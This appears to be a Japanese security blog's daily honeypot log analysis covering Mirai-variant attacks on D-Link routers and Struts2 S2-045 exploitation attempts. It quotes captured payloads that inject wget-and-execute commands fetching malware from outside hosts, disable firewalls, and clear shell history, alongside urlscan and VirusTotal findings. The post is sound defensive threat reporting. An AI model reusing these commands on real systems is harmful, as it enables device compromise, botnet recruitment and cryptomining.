S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/08/23)

ハニーポットのログ分析(2018/08/23)

honeypot

WOWhoneypotの2018/08/23(運用81日目)の簡易分析です。
本日の総アクセス件数は 44件です。以下が全アクセスログです。

19 2018-08-23 GET /
11 2018-08-23 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://176.32.32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
8 2018-08-23 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$
4 2018-08-23 GET /index.action
1 2018-08-23 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ 
1 2018-08-23 HEAD /

本日もまたD-Linkの脆弱性を攻撃するMirai亜種が複数来ています。 

GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1
User-Agent: Shinka/1.0

GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1
User-Agent: Gemini/2.0

GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1
User-Agent: Hakai/2.0

GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1
User-Agent: LMAO/2.0

さて、Shinka/1.0(とGemini/2.0)がダウンロードするペイロードを見てみましょう。
hxxp://209.141.33[.]86/d をスキャンすると、中身がシェルスクリプトであることが分かります。
https://urlscan.io/result/e101f540-27e4-45cc-8de6-0588685e3a17
この中で、更に以下をダウンロードすることが分かります。
hxxp://209.141.33[.]86/bins/.shinka.mips
hxxp://209.141.33[.]86/bins/.shinka.mpsl
これらをスキャンすると、実行ファイルであり、ハッシュ値からVirusTotalで確認することもでき、Linux/Miraiであることが分かります。
https://urlscan.io/result/31a9d836-1c9f-4401-a6af-506830cb29a5
https://www.virustotal.com/#/file/00ad20514054639bc5337d9bf673fd875aa5bacd702ce21af760b8cbb9939009/detection
https://urlscan.io/result/41bf9dfe-f511-43dc-8e4d-e5cac54ede6d
https://www.virustotal.com/#/file/9c6c4016b3ab1f50edb12291259d96f9bf6a7ccd3cfa7608dd5ac0dd62e1c719/detection

Hakai/2.0の取得先(hxxp://176.32.32.156/bin)については、そのまま実行ファイル形式でこれもMirai亜種で有ることが分かります。

https://urlscan.io/result/29f0364d-7542-4b14-81eb-41e6a87e0f5e
https://www.virustotal.com/#/file/fa588bdc625f5103d4960f5905a9b314a78de8dd35eccdf3e62ca52963148ee3/detection

LMAO/2.0の取得先(hxxp://212.237.32.62/k)は既にアクセスできませんが、過去の状態を確認したところ、これはシェルスクリプトで更に本体をダウンロードするようです。
https://urlscan.io/result/9b972d26-b8d6-41d3-8fc3-471fb72ee337/
以下はシェルスクリプト内でダウンロードするもので、どれもMirai亜種のマルウェアです。
https://urlscan.io/result/37e07107-0796-4c22-bae4-f740000164a0/
https://urlscan.io/result/665dfc4e-0e4c-47a4-9e76-28ef91261626/
https://urlscan.io/result/daa4112e-3d8e-4402-894a-5a294127cf6d/
https://urlscan.io/result/4d0e98a5-1efd-4a48-b661-ddd451d13ad3/
https://urlscan.io/result/b37813e4-fa31-4022-95d8-95e3a210ea81/

 

その他はApache Struts2脆弱性を突く攻撃です。これは直近公開されたものではなく、以前から検知している S2-045(CVE-2017-5638)によるものです。内容は以下です。

cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c hxxp://23.249.162[.]123:9998/servic;'
cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c hxxp://aaa.linuxa[.]club:57843/linux;chmod 777 linux;./linux;chattr +i linux;'
cmd='chmod 777 servic;./servic;chattr +i servic;history -c;'
cmd='wget -P /tmp http://hfs.mhacker[.]cc:9278/Linux.server;chmod 777 /tmp/Linux.server;/tmp/Linux.server'

この内、hxxp://23.249.162[.]123:9998/servicは以下の通り、CoinMinerでした。

https://urlscan.io/result/3470cbe5-f540-4f71-b0b6-8ba00ef7ed30
https://www.virustotal.com/#/file/04c587db92e7dc20ee5b6203357909f0075e11aa1088cca98d24652b5cc8351a/detection

 

本日のハンティングログは以下です。Mirai亜種とStruts脆弱性で検知したものです。

11 2018-08-23 wget hxxp://176.32.32.156/bin
8 2018-08-23 wget hxxp://209.141.33.86/d
1 2018-08-23 wget hxxp://212.237.32.62/k
1 2018-08-23 wget -c hxxp://23.249.162.123:9998/servic 
1 2018-08-23 wget -c hxxp://aaa.linuxa.club:57843/linux
1 2018-08-23 wget -P /tmp hxxp://hfs.mhacker.cc:9278/Linux.server

 

以上です。